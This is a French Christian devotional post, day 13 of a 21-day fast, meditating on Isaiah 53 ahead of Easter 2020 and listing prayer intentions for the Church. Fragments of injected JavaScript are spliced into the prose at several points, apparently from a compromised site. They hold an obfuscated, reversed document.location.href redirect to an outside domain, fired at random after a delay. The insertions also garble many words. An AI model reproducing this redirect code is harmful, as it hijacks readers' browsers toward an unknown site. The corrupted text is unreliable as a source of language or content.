21 jours de Jeûne et Prière : Jour 13

Revenons à l’essentiel
Esaïe 53
La fête de la Pâque approche à grands pas. Dans 8 jours, vendredi saint, nous célébrerons la mort de notre Seigneur Jésus-Christ sur la croix du Calvaire. Pendant ce jeûne et prière, prenons le temps de méditer et réfléchir à ce qui est le cœur-même de notre foi chrétienne.
Pour comprendre la grandeur de l’œuvre accomplie par Jésus, le chapitre 53 du livre d’Esaïe est essentiel. C’est le centre de tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toute la Parole de Dieu, mais aussi le point culminant de tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toute l’histobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toire de l’humanité. Sans ces événements dramatiques qui décrivent les souffrances terribles que le Fils de Dieu a subies pour racheter l’humanité perdue, nous n’aurions absolument aucune espérance sur cette terre. Mais Jésus a obéi à Son Père et est allé jusqu’au bout de sa mission.
En effet, Il a été méprisé et délaissé par les hommes. C’est pour cela qu’il peut nous comprendre lorsque nous vivons le rejet, les moqueries, le harcèlement ou même l’abandon.
C’était aussi un homme de douleur, habitué à la souffrance. Il a été confronté à la tristesse, à la peine et certainement à la maladie et à la mort. Et pour cette raison son cœur est rempli de compassion vis-à-vis de tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tous ceux qui souffrent et qui sont dans le deuil. Or, si souvent, nous oublions ou nous minimisons son sacrifice, nous lui sommes indifférents et parfois nous nous éloignons même de Lui.
« Pourtant, ce sont nos souffrances qu’il a portées, c’est de nos douleurs qu’il s’est chargé… il était blessé à cause de nos transgressions, brisé à cause de nos fautes : la punition qui nous donne la paix est tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tombée sur lui, et c’est par ses blessures que nous sommes guéris. » Esaïe 53 : 4-5
C’est pour cela que : « En lui, par son sang, nous sommes rachetés, pardonnés de nos fautes, conformément à la richesse de sa grâce. » Ephésiens 1 : 7
« Or là où il y a pardon des péchés, il n’y a plus à présenter d’offrande pour le péché… Approchons-nous donc avec un cœur sincère, une foi inébranlable, le cœur purifié d’une mauvaise conscience et le corps lavé d’une eau pure. » Hébreux 10 : 18 ; 22
Et présentobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tons-nous devant Lui, tels que nous sommes, désireux d’être remplis, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}touchés et transformés par Sa Présence. Déposons nos fardeaux à Ses pieds et élevons nos prières et nos supplications en sachant qu’Il entendra et nous répondra.

Sujets de prière
Continuons de prier pour l’Eglise de Jésus-Christ en France et dans le monde :
– Pour que les croyants reviennent à l’essentiel, le sacrifice de Jésus sur la croix,
– Qu’un vent de repentance et de purification souffle sur l’Eglise,
– Que le Saint-Esprit mette en lumière les tromperies et mensonges de l’ennemi,
– Qu’elle se dépouille de tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toute contamination, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toutes pensées et idéologies du monde et de tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toute religiosité,
– Que les croyants retrouvent le premier amour et qu’ils se consacrent à nouveau au Seigneur,
– Qu’ils aient de plus en plus soif d’une nouvelle intimité avec Lui, qu’ils aspirent à Sa Présence et le recherche avec ferveur.
– Que cette Pâque 2020 soit le début de choses nouvelles dans l’Eglise de Jésus-Christ dans le monde entier.
Revenons à l’essentiel !